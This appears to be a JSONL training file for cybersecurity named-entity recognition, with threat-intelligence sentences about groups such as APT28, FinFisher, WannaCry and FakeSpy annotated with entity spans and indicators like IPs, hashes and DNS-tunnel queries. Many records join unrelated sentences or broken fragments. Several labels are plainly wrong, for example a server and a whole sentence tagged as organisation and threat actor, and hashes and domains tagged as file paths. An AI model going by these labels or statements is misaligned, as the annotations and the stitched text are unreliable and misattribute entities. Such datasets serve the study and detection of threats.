{"text": "At least in most recent versions , as of January 2019 , the Zip archive would actually contain the i686 , arm and arm64 versions of all deployed binaries . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region . This campaign started in November 2019 and it is still ongoing . According to Kaspersky telemetry , targeted organizations included political bodies in Europe .", "spans": {"ORGANIZATION: FireEye 's DTI": [[188, 202]], "MALWARE: malicious attachments": [[242, 263]], "ORGANIZATION: banks": [[287, 292]], "ORGANIZATION: Kaspersky": [[399, 408]], "ORGANIZATION: political bodies": [[453, 469]]}, "info": {"id": "cyberner_stix_train_007304", "source": "cyberner_stix_train"}}
{"text": "It doesn’t have an encryption/decryption routine for network communication .", "spans": {}, "info": {"id": "cyberner_stix_train_007305", "source": "cyberner_stix_train"}}
{"text": "Stage 1 : Loader malware keeps sandbox and debuggers away The first stage of FinFisher running through this complicated virtual machine is a loader malware designed to probe the system and determine whether it ’ s running in a sandbox environment ( typical for cloud-based detonation solution like Office 365 ATP ) . One payload was a Python based open source remote administration tool ( RAT ) called Pupy . Winnti : 4256fa6f6a39add6a1fa10ef1497a74088f12be0 2018-07-25 10:13:41 None . According to Kaspersky telemetry , targeted organizations included political bodies in Europe .", "spans": {"MALWARE: FinFisher": [[77, 86]], "SYSTEM: Office 365 ATP": [[298, 312]], "TOOL: RAT": [[389, 392]], "TOOL: Pupy": [[402, 406]], "THREAT_ACTOR: Winnti": [[409, 415]], "FILEPATH: 4256fa6f6a39add6a1fa10ef1497a74088f12be0": [[418, 458]], "ORGANIZATION: Kaspersky": [[499, 508]], "ORGANIZATION: political bodies": [[553, 569]]}, "info": {"id": "cyberner_stix_train_007306", "source": "cyberner_stix_train"}}
{"text": ") Calculate the difference between this pointer and the User32 base address . While the recent paper from Trend Micro and ClearSky ( ' The Spy Kittens Are Back : Rocket Kitten 2 ' ) does extensively cover the campaign 's narrative , we aimed to seek confirmation that our analyzed attack was positively connected to the same campaign and set out to provide additional value and insight . After resolving the APIs , the shellcode will decrypt the launcher binary and load it to the memory . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": {"ORGANIZATION: Trend Micro": [[106, 117]], "ORGANIZATION: ClearSky": [[122, 130]], "THREAT_ACTOR: Spy Kittens": [[139, 150]], "THREAT_ACTOR: Rocket Kitten": [[162, 175]], "TOOL: APIs": [[408, 412]], "ORGANIZATION: Microsoft Exchange server": [[640, 665]]}, "info": {"id": "cyberner_stix_train_007307", "source": "cyberner_stix_train"}}
{"text": "For example , one commercial obfuscator , which cost €350 , was used for Trojans and Opfak.bo Obad.a Android vulnerabilities are used by criminals for three reasons : to bypass the code integrity check when installing an application ( vulnerability Master Key ) ; to enhance the rights of malicious applications , considerably extending their capabilities ; and to make it more difficult to remove malware . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" — a near-year-old Java security hole — \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported . The encrypted payload is located in the .rdata section of hpqhvsei.dll and the decryption algorithm is an XOR loop where the XOR key is updated at each iteration . WithSecure has identified instances where the malware was delivered to victims through LinkedIn .", "spans": {"MALWARE: Opfak.bo Obad.a": [[85, 100]], "VULNERABILITY: zero-day vulnerabilities": [[411, 435]], "VULNERABILITY: CVE-2011-3544": [[532, 545]], "VULNERABILITY: CVE-2010-0738": [[593, 606]], "ORGANIZATION: Dell SecureWorks'": [[639, 656]], "FILEPATH: hpqhvsei.dll": [[738, 750]], "ORGANIZATION: WithSecure": [[844, 854]], "MALWARE: malware": [[890, 897]], "TOOL: LinkedIn": [[931, 939]]}, "info": {"id": "cyberner_stix_train_007308", "source": "cyberner_stix_train"}}
{"text": "In addition , end users can also benefit from security solutions such as Trend Micro Home Security for Mac , which provides comprehensive security and multi-device protection against viruses , ransomware , malicious websites , and identity thieves .", "spans": {"ORGANIZATION: Trend Micro Home Security": [[73, 98]], "SYSTEM: Mac": [[103, 106]], "MALWARE: viruses": [[183, 190]], "MALWARE: ransomware": [[193, 203]], "MALWARE: malicious websites": [[206, 224]], "MALWARE: identity thieves": [[231, 247]]}, "info": {"id": "cyberner_stix_train_007309", "source": "cyberner_stix_train"}}
{"text": "In one sample analyzed by CTU researchers , PlugX was configured with hard-coded user credentials to bypass a proxy that required authentication .", "spans": {"ORGANIZATION: CTU": [[26, 29]], "MALWARE: PlugX": [[44, 49]]}, "info": {"id": "cyberner_stix_train_007310", "source": "cyberner_stix_train"}}
{"text": "PINCHY SPIDER is the criminal group behind the development of the ransomware most commonly known as GandCrab , which has been active since January 2018 . Butterfly has attacked multi-billion dollar companies operating in the internet , IT software , pharmaceutical , and commodities sectors .", "spans": {"THREAT_ACTOR: PINCHY SPIDER": [[0, 13]], "TOOL: GandCrab": [[100, 108]], "THREAT_ACTOR: Butterfly": [[154, 163]], "ORGANIZATION: multi-billion dollar companies": [[177, 207]], "ORGANIZATION: pharmaceutical": [[250, 264]], "ORGANIZATION: commodities sectors": [[271, 290]]}, "info": {"id": "cyberner_stix_train_007311", "source": "cyberner_stix_train"}}
{"text": "The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users . The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars .", "spans": {"THREAT_ACTOR: actor’s": [[11, 18]], "MALWARE: malicious payload": [[72, 89]], "ORGANIZATION: users": [[154, 159]], "FILEPATH: Seminar-Invitation.doc": [[202, 224]], "TOOL: Microsoft Word": [[248, 262]], "MALWARE: ThreeDollars": [[284, 296]]}, "info": {"id": "cyberner_stix_train_007312", "source": "cyberner_stix_train"}}
{"text": "For alerts raised either by specific threat intelligence tied to activity groups or by more generic suspicious behaviors , Windows Defender ATP provides rich , visualized technical context .", "spans": {"TOOL: Windows Defender ATP": [[123, 143]]}, "info": {"id": "cyberner_stix_train_007313", "source": "cyberner_stix_train"}}
{"text": "As a curiosity , most PinchDuke samples contain a Russian language error message : “ There is an error in the module ’s name ! The length of the data section name must be 4 bytes ” .", "spans": {"MALWARE: PinchDuke": [[22, 31]]}, "info": {"id": "cyberner_stix_train_007314", "source": "cyberner_stix_train"}}
{"text": "] 122:28833 61 [ . This neatly ties together many of the tools used by the Dukes group , as versions of this one loader have been used to load malware from three different Dukes-related toolsets CosmicDuke , PinchDuke , and MiniDuke – over the course of five years . This approach has also been used in different Empire modules . The July 2023 campaign has a slightly modified infection chain .", "spans": {"THREAT_ACTOR: Dukes group": [[75, 86]], "TOOL: CosmicDuke": [[195, 205]], "TOOL: PinchDuke": [[208, 217]], "TOOL: MiniDuke": [[224, 232]], "TOOL: Empire": [[313, 319]]}, "info": {"id": "cyberner_stix_train_007315", "source": "cyberner_stix_train"}}
{"text": "We are constantly on the lookout for new threats and we are expanding our protections . Syncopate is a well-known Russian company that is best known as the developer and operator of the ' GameNet ' platform . Using host-based digital forensic analysis , CTU analysts observed the intruders using the native ‘ at.exe ’ Windows task scheduler tool to move laterally within the infrastructure . The web page “ about.htm ” implements an exploit for Microsoft Internet Explorer 8 .", "spans": {"ORGANIZATION: company": [[122, 129]], "ORGANIZATION: CTU": [[254, 257]], "FILEPATH: at.exe": [[309, 315]], "SYSTEM: Windows": [[318, 325]], "SYSTEM: Microsoft Internet Explorer 8": [[445, 474]]}, "info": {"id": "cyberner_stix_train_007316", "source": "cyberner_stix_train"}}
{"text": "This , in turn , would provide access to a larger amount of intellectual property and sensitive data . During this time , the attacker must ensure continued access to the target environment or risk losing years of effort and potentially expensive custom ICS malware .", "spans": {"MALWARE: ICS": [[254, 257]], "MALWARE: malware": [[258, 265]]}, "info": {"id": "cyberner_stix_train_007317", "source": "cyberner_stix_train"}}
{"text": "All of the PHAs that are mentioned in this blog post were detected and removed by Google Play Protect . To control the full operation , MoneyTaker uses a Pentest framework Server . This demonstrates that the threat actors understand conventional Japanese date notation . We observed that in at least two cases , the threat actors subsequently issued the following command against the Exchange web server : This command attempts to delete the administrator user from the Exchange Organizations administrators group , beginning with the Domain Controller in the current domain .", "spans": {"SYSTEM: Google Play Protect": [[82, 101]], "THREAT_ACTOR: MoneyTaker": [[136, 146]], "TOOL: Pentest framework Server": [[154, 178]], "SYSTEM: Exchange web server": [[384, 403]]}, "info": {"id": "cyberner_stix_train_007318", "source": "cyberner_stix_train"}}
{"text": "Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service .", "spans": {"TOOL: WannaCry": [[72, 80]], "FILEPATH: TajMahal": [[214, 222]], "ORGANIZATION: Kaspersky": [[257, 266]]}, "info": {"id": "cyberner_stix_train_007319", "source": "cyberner_stix_train"}}
{"text": "Once the Trojan establishes the server ’s authenticity , it expects a variable-size block of binary code that is read from the server straight into the virtual space for iexplore.exe and then executed .", "spans": {"MALWARE: Trojan": [[9, 15]], "FILEPATH: iexplore.exe": [[170, 182]]}, "info": {"id": "cyberner_stix_train_007320", "source": "cyberner_stix_train"}}
{"text": "] 87:28855 61 [ . As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , and thus the threat actor operating the toolsets started to be commonly referred to as \" Dukes \" . This request is then stored in the CommonApplicationData directory ( C:\\ProgramData in Vista and later ) as the hard coded file name ( highlighted in green ) . The use of 3AM was only partially successful .", "spans": {"THREAT_ACTOR: group": [[107, 112]], "TOOL: MiniDuke": [[137, 145]], "THREAT_ACTOR: threat actor": [[161, 173]], "THREAT_ACTOR: Dukes": [[237, 242]], "MALWARE: 3AM": [[418, 421]]}, "info": {"id": "cyberner_stix_train_007321", "source": "cyberner_stix_train"}}
{"text": "] jp/佐川急便.apk hxxp : //mailsa-qae [ . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations , and characterized APT28 's activity as aligning with the Russian Government 's strategic intelligence requirements . Once an A record response is received by the malware containing 253.25.42.87 , several variables are set in preparation to exit the send . Currently , Mandiant can neither validate claims related to Zarya ’s hacking capabilities , nor those related to the group ’s potential links to the FSB .", "spans": {"ORGANIZATION: FireEye": [[56, 63]], "THREAT_ACTOR: APT28": [[73, 78], [152, 157]], "IP_ADDRESS: 253.25.42.87": [[315, 327]], "ORGANIZATION: Mandiant": [[402, 410]], "ORGANIZATION: FSB": [[539, 542]]}, "info": {"id": "cyberner_stix_train_007322", "source": "cyberner_stix_train"}}
{"text": "The FakeSpy malware has been found to masquerade as any of the following companies : United States Postal Service - An independent agency of the executive branch of the United States federal government . FireEye also noted in their 2017 report that the online handle xman_1365_x , ” found within the PDB path in an APT33 TURNEDUP backdoor sample , belonged to an individual at the Nasr Institute . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": {"MALWARE: FakeSpy": [[4, 11]], "ORGANIZATION: United States Postal Service": [[85, 113]], "ORGANIZATION: FireEye": [[204, 211]], "THREAT_ACTOR: APT33": [[315, 320]], "ORGANIZATION: CSIS": [[448, 452]], "MALWARE: Carbanak": [[486, 494]], "ORGANIZATION: customers": [[524, 533]]}, "info": {"id": "cyberner_stix_train_007323", "source": "cyberner_stix_train"}}
{"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . Emissary Panda is still active and continues to target selected organisations .", "spans": {"MALWARE: malicious documents": [[29, 48]], "VULNERABILITY: CVE-2017-0199": [[60, 73]], "TOOL: LATENTBOT malware": [[99, 116]]}, "info": {"id": "cyberner_stix_train_007324", "source": "cyberner_stix_train"}}
{"text": "With the capability to open a given URL in a browser , the actor behind ‘ SimBad ’ can generate phishing pages for multiple platforms and open them in a browser , thus performing spear-phishing attacks on the user . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens . While we know the attackers used a custom dropper to install the back door , we do not know the delivery vector .", "spans": {"MALWARE: SimBad": [[74, 80]], "THREAT_ACTOR: threat groups": [[428, 441]], "THREAT_ACTOR: OilRig": [[452, 458]], "THREAT_ACTOR: CopyKittens": [[463, 474]], "MALWARE: custom dropper": [[512, 526]]}, "info": {"id": "cyberner_stix_train_007325", "source": "cyberner_stix_train"}}
{"text": "On later versions , specifically iOS 12.1.1 and iOS 12.2 , the process is different . Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries . This response tells the malware to set a variable for the file name to receivebox\\rcvd10100 and set the next query action to D in order to request the next chunk of . The site also claimed to include the names , addresses and phone numbers of top CEOs .", "spans": {"SYSTEM: iOS 12.1.1": [[33, 43]], "SYSTEM: iOS 12.2": [[48, 56]], "THREAT_ACTOR: APT groups": [[171, 181]], "ORGANIZATION: high-tech": [[276, 285]], "ORGANIZATION: government services": [[288, 307]], "ORGANIZATION: media": [[310, 315]], "ORGANIZATION: financial services industries": [[320, 349]], "FILEPATH: receivebox\\rcvd10100": [[423, 443]], "THREAT_ACTOR: The site also claimed to include the names , addresses and phone numbers of top CEOs": [[519, 603]]}, "info": {"id": "cyberner_stix_train_007326", "source": "cyberner_stix_train"}}
{"text": "As a result , these organizations are often exposed to increased government-directed threats aimed at monitoring their activities , discrediting their work , or stealing their intellectual property .", "spans": {}, "info": {"id": "cyberner_stix_train_007327", "source": "cyberner_stix_train"}}
{"text": "EventBot appears to be a completely new malware in the early stages of development , giving us an interesting view into how attackers create and test their malware . Some hackers even went onto use the Cisco exploits in the wild . APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB ) and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs .", "spans": {"MALWARE: EventBot": [[0, 8]], "VULNERABILITY: Cisco exploits": [[202, 216]], "THREAT_ACTOR: APT10": [[231, 236]], "ORGANIZATION: technology": [[381, 391]], "ORGANIZATION: telecommunications sector": [[396, 421]], "ORGANIZATION: MSPs": [[535, 539]]}, "info": {"id": "cyberner_stix_train_007328", "source": "cyberner_stix_train"}}
{"text": "The exploit uses CVE-2015-1701 to execute a callback in userspace .", "spans": {"VULNERABILITY: CVE-2015-1701": [[17, 30]]}, "info": {"id": "cyberner_stix_train_007329", "source": "cyberner_stix_train"}}
{"text": "] com/gate_cb8a5aea1ab302f0_c offline 31.214.157 [ . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's .", "spans": {"MALWARE: KopiLuwak": [[74, 83]], "THREAT_ACTOR: hacker": [[223, 229]], "THREAT_ACTOR: Behzad Mesri": [[232, 244], [452, 464]], "THREAT_ACTOR: Turk Black Hat": [[260, 274]], "THREAT_ACTOR: ArYaIeIrAn": [[286, 296]], "MALWARE: PersianDNS": [[360, 370]], "MALWARE: Mahanserver": [[373, 384]], "ORGANIZATION: Facebook": [[433, 441]]}, "info": {"id": "cyberner_stix_train_007330", "source": "cyberner_stix_train"}}
{"text": "Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.r23 :", "spans": {"FILEPATH: Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.r23": [[0, 56]]}, "info": {"id": "cyberner_stix_train_007331", "source": "cyberner_stix_train"}}
{"text": "Later , in January 2018 , a report was released that identified similarities between the BitPaymer ransomware and Dridex malware . But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26 , 2018 .", "spans": {"TOOL: BitPaymer ransomware": [[89, 109]], "TOOL: Dridex malware": [[114, 128]], "THREAT_ACTOR: ScarCruft": [[146, 155]]}, "info": {"id": "cyberner_stix_train_007332", "source": "cyberner_stix_train"}}
{"text": "According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . These spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "THREAT_ACTOR: admin@338": [[27, 36]], "VULNERABILITY: Microsoft Office vulnerabilities": [[104, 136]], "TOOL: LOWBALL": [[187, 194]], "TOOL: emails": [[218, 224]], "TOOL: email": [[305, 310]]}, "info": {"id": "cyberner_stix_train_007333", "source": "cyberner_stix_train"}}
{"text": "Cannon acknowledges the successful move by sending an email to sahro.bella7@post.cz with l.txt ( contains 090 string ) as the attachment , ok4 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[54, 59]], "EMAIL: sahro.bella7@post.cz": [[63, 83]], "FILEPATH: l.txt": [[89, 94]]}, "info": {"id": "cyberner_stix_train_007334", "source": "cyberner_stix_train"}}
{"text": "The classes.dex has implementation for only two classes : The main application class gCHotRrgEruDv , which is involved when the application opens A helper class that has definition for custom encryption and decryption This means that there ’ s no code corresponding to the services declared in the manifest file : Main Activity , Broadcast Receivers , and Background . The MyWeb sample that FireEye analyzed has a compile date of 1/20/2011 . The message claimed to be from an Export Operation Specialist of USCO Logistics and that it was sent as per their customer . Collect NSPPE core dump files from NetScaler .", "spans": {"TOOL: MyWeb sample": [[373, 385]], "ORGANIZATION: FireEye": [[391, 398]], "ORGANIZATION: USCO Logistics": [[507, 521]]}, "info": {"id": "cyberner_stix_train_007335", "source": "cyberner_stix_train"}}
{"text": "Packing the payloads with the Enigma packer .", "spans": {"TOOL: Enigma": [[30, 36]]}, "info": {"id": "cyberner_stix_train_007336", "source": "cyberner_stix_train"}}
{"text": "Application launch When launching for the first time , the Trojan checks if it is being launched in an emulation environment , and in which country it is being launched . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document . In November 2017 , SecureWorks Counter Threat Unit ( CTU ) researchers investigated a widespread and opportunistic WCry ransomware campaign that impacted many systems around the world .", "spans": {"MALWARE: Attachments": [[171, 182]], "ORGANIZATION: SecureWorks Counter Threat Unit": [[321, 352]], "ORGANIZATION: CTU": [[355, 358]]}, "info": {"id": "cyberner_stix_train_007337", "source": "cyberner_stix_train"}}
{"text": "Phone data ( phone number , OS version , phone model , SDK version ) . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Meanwhile , NEODYMIUM used well-tailored spear-phishing emails with attachments that delivered the exploit code , ultimately leading to Wingbird 's installation on victim computers .", "spans": {"MALWARE: Microsoft Word attachment": [[151, 176]], "VULNERABILITY: CVE-2017-0199": [[209, 222]], "TOOL: ZeroT Trojan": [[237, 249]], "TOOL: PlugX Remote Access Trojan": [[281, 307]], "TOOL: RAT": [[310, 313]], "THREAT_ACTOR: NEODYMIUM": [[330, 339]], "TOOL: emails": [[374, 380]], "VULNERABILITY: exploit": [[417, 424]], "MALWARE: Wingbird": [[454, 462]]}, "info": {"id": "cyberner_stix_train_007338", "source": "cyberner_stix_train"}}
{"text": "The core malware is usually disguised as Google Updater , Google Update for U or “ com.google.vending ” . We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack that we did not have detailed targeting information . The Dexphot attack used a variety of sophisticated methods to evade security solutions . During the SolarWinds Compromise , APT29 registered devices in order to enable mailbox syncing via the Set - CASMailbox command . .006", "spans": {"ORGANIZATION: Google": [[41, 47], [58, 64]], "TOOL: Bookworm samples": [[122, 138]], "MALWARE: Dexphot": [[307, 314]], "THREAT_ACTOR: SolarWinds Compromise": [[403, 424]], "THREAT_ACTOR: APT29": [[427, 432]]}, "info": {"id": "cyberner_stix_train_007339", "source": "cyberner_stix_train"}}
{"text": "When before it had used several different social media platforms , it now uses the Twitter platform , something FakeSpy has done in its past attacks . APT28 malware , in particular the family of modular backdoors that we call CHOPSTICK , indicates a formal code development environment . Query: 00039e9650eca66C06T.sample-domain.evil , Response: 24.125.10.140 , File name: 10140, Query: 139e965e000ca6D2C80T.sample-domain.evil , Response: 110.101.116.0 , Query: 00339e965e1ca6EF4C07T.sample-domain.evil , Response: 32.117.115.3 , Query: 30069e 1965eca6FE8C13T.sample-domain.evil, Response: 101.114.32.6 , Query: 391 e960095eca63570BC62T.sample-domain.evil , Response: 1.2.3.0 . The arrest makes him the third LockBit affiliate charged in the US since November .", "spans": {"ORGANIZATION: Twitter": [[83, 90]], "MALWARE: FakeSpy": [[112, 119]], "TOOL: APT28 malware": [[151, 164]], "TOOL: CHOPSTICK": [[226, 235]], "FILEPATH: 00039e9650eca66C06T.sample-domain.evil": [[295, 333]], "IP_ADDRESS: 24.125.10.140": [[346, 359]], "FILEPATH: 139e965e000ca6D2C80T.sample-domain.evil": [[387, 426]], "IP_ADDRESS: 110.101.116.0": [[439, 452]], "FILEPATH: 00339e965e1ca6EF4C07T.sample-domain.evil": [[462, 502]], "IP_ADDRESS: 32.117.115.3": [[515, 527]], "IP_ADDRESS: 101.114.32.6": [[590, 602]], "FILEPATH: 391 e960095eca63570BC62T.sample-domain.evil": [[612, 655]], "IP_ADDRESS: 1.2.3.0": [[668, 675]], "THREAT_ACTOR: LockBit": [[709, 716]]}, "info": {"id": "cyberner_stix_train_007340", "source": "cyberner_stix_train"}}
{"text": "Record phone calls audio in 3gp format . Once gaining a foothold on a user 's system , the threat actors behind STOLEN PENCIL use Microsoft 's Remote Desktop Protocol ( RDP ) for remote point-and-click access . This campaign uses social engineering and decoy documents related to geopolitical affairs and relations between the Palestinian government , and references Egypt , Hezbollah , and Iran . As with other groups , it is possible that espionage and intelligence gathering are the first steps toward deploying ransomware or wiper malware .", "spans": {"ORGANIZATION: Microsoft": [[130, 139]], "TOOL: Remote Desktop Protocol": [[143, 166]], "TOOL: RDP": [[169, 172]], "ORGANIZATION: Palestinian government": [[327, 349]]}, "info": {"id": "cyberner_stix_train_007341", "source": "cyberner_stix_train"}}
{"text": "One of the C2 locations for the new payload , 87.236.215.246 , also hosts a suspected APT28 domain ssl-icloud.com .", "spans": {"TOOL: C2": [[11, 13]], "IP_ADDRESS: 87.236.215.246": [[46, 60]], "THREAT_ACTOR: APT28": [[86, 91]], "DOMAIN: ssl-icloud.com": [[99, 113]]}, "info": {"id": "cyberner_stix_train_007342", "source": "cyberner_stix_train"}}
{"text": "\" Users must realize that they can no longer trust in installing only apps with a high reputation from official app stores as their sole defense , '' the researchers wrote in an e-mail to Ars . The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant . We continue to monitor the activities of both groups closely . Cisco Secure Endpoint ( formerly AMP for Endpoints ) is ideally suited to prevent the execution of the malware detailed in this post .", "spans": {"ORGANIZATION: Ars": [[188, 191]], "TOOL: IndiaBravo-PapaAlfa installer": [[198, 227]], "TOOL: Cisco Secure Endpoint": [[347, 368]], "TOOL: AMP for Endpoints": [[380, 397]]}, "info": {"id": "cyberner_stix_train_007343", "source": "cyberner_stix_train"}}
{"text": "Figure 26 : “ Agent Smith ” Campaign timeline Greater “ Agent Smith ” Campaign Discovery Orchestrating a successful 9Apps centric malware campaign , the actor behind “ Agent Smith ” established solid strategies in malware proliferation and payload delivery . We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover . Dexphot : 537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e . To me , simply asking critical infrastructure to consider these factors as part of their normal processes seems like a non - issue , but the U.S. Appeals Court has put a hold on this rule for the time being ( though it did n’t give a precise reason at the time of its ruling ) .", "spans": {"MALWARE: Agent Smith": [[14, 25], [56, 67], [168, 179]], "SYSTEM: 9Apps": [[116, 121]], "TOOL: SNEEPY/BYEBYESHELL": [[406, 424]], "MALWARE: CONFUCIUS_B": [[433, 444]], "TOOL: Hangover": [[466, 474]], "MALWARE: Dexphot": [[477, 484]], "FILEPATH: 537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e": [[487, 551]], "ORGANIZATION: critical infrastructure": [[576, 599]], "ORGANIZATION: U.S. Appeals Court": [[695, 713]]}, "info": {"id": "cyberner_stix_train_007344", "source": "cyberner_stix_train"}}
{"text": "To run its code in kernel mode in the most recent versions of operating systems , that have Driver Signature Enforcement , Slingshot loads signed vulnerable drivers and runs its own code through their vulnerabilities . LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": {"TOOL: Slingshot": [[123, 132]], "THREAT_ACTOR: Barium": [[228, 234]], "ORGANIZATION: SOC personnel": [[305, 318]]}, "info": {"id": "cyberner_stix_train_007345", "source": "cyberner_stix_train"}}
{"text": "Link embedded in the PDF document : https://csaasd.egnyte.com/dd/h5s7YHzOy5 .", "spans": {"TOOL: PDF": [[21, 24]], "URL: https://csaasd.egnyte.com/dd/h5s7YHzOy5": [[36, 75]]}, "info": {"id": "cyberner_stix_train_007346", "source": "cyberner_stix_train"}}
{"text": "In an example observed by CTU researchers , the Nbtscan executable was named Adobe.exe and was installed in several working directories on compromised hosts , including : C:\\Recovery\\ .", "spans": {"ORGANIZATION: CTU": [[26, 29]], "TOOL: Nbtscan": [[48, 55]], "FILEPATH: Adobe.exe": [[77, 86]]}, "info": {"id": "cyberner_stix_train_007347", "source": "cyberner_stix_train"}}
{"text": "Swiss Post - The national postal service of Switzerland , a fully state-owned limited company ( AG ) regulated by public law . While we haven’t observed a widespread targeting of commercial entities or regional adversaries like in previously documented APT33 operations , the handful of targeted organizations that we did observe were mainly located in Saudi Arabia across a range of industries , indicating ongoing targeting aligned with geopolitical aims . Starting in February 2018 , Unit 42 identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"ORGANIZATION: Swiss Post": [[0, 10]], "ORGANIZATION: we": [[133, 135]], "THREAT_ACTOR: APT33": [[253, 258]], "ORGANIZATION: Unit 42": [[487, 494]], "THREAT_ACTOR: Gorgon Group": [[552, 564]], "ORGANIZATION: governmental organizations": [[575, 601]]}, "info": {"id": "cyberner_stix_train_007348", "source": "cyberner_stix_train"}}
{"text": "For versions 11.0 and 11.4 , the installation is straightforward . The new campaigns mark the first significant stirrings from the APT12 since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China . The expected TXT record response has the following structure: . For these reasons , OT defenders and asset owners should take mitigating actions against COSMICENERGY to preempt in the wild deployment and to better understand common features and capabilities that are frequently deployed in OT malware .", "spans": {"THREAT_ACTOR: APT12": [[131, 136]], "THREAT_ACTOR: group": [[209, 214]], "ORGANIZATION: OT defenders": [[418, 430]], "ORGANIZATION: asset owners": [[435, 447]], "MALWARE: COSMICENERGY": [[487, 499]]}, "info": {"id": "cyberner_stix_train_007349", "source": "cyberner_stix_train"}}
{"text": "After unpacking itself , the Spark backdoor creates a hidden window where most of the malicious activity is handled .", "spans": {"MALWARE: Spark backdoor": [[29, 43]], "SYSTEM: window": [[61, 67]]}, "info": {"id": "cyberner_stix_train_007350", "source": "cyberner_stix_train"}}
{"text": "By : Tony Bao , Junzhi Lu April 14 , 2020 We discovered a potential cyberespionage campaign , which we have named Project Spy , that infects Android and iOS devices with spyware ( detected by Trend Micro as AndroidOS_ProjectSpy.HRX and IOS_ProjectSpy.A , respectively ) . Previously , LookingGlass reported on a campaign they named \" Operation Armageddon \" , targeting individuals involved in the Ukrainian military and national security establishment . the following functions with multiple control flow dispatchers can be unflattened . A New Threat on the Horizon : CL0P", "spans": {"MALWARE: Project Spy": [[114, 125]], "SYSTEM: Android": [[141, 148]], "SYSTEM: iOS": [[153, 156]], "ORGANIZATION: Trend Micro": [[192, 203]], "ORGANIZATION: LookingGlass": [[285, 297]], "ORGANIZATION: military": [[407, 415]], "THREAT_ACTOR: CL0P": [[568, 572]]}, "info": {"id": "cyberner_stix_train_007351", "source": "cyberner_stix_train"}}
{"text": "The recommendations provided are not only good advice , but also provide indications of how INDRIK SPIDER breaches organizations and moves laterally until domain controller access is gained . attacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[92, 105]], "TOOL: emails": [[226, 232]], "VULNERABILITY: exploit": [[277, 284]], "THREAT_ACTOR: ScarCruft": [[305, 314]]}, "info": {"id": "cyberner_stix_train_007352", "source": "cyberner_stix_train"}}
{"text": "The initial dropper ( which varies across attacks ) is delivered to the victim via email or web :", "spans": {"TOOL: email": [[83, 88]]}, "info": {"id": "cyberner_stix_train_007353", "source": "cyberner_stix_train"}}
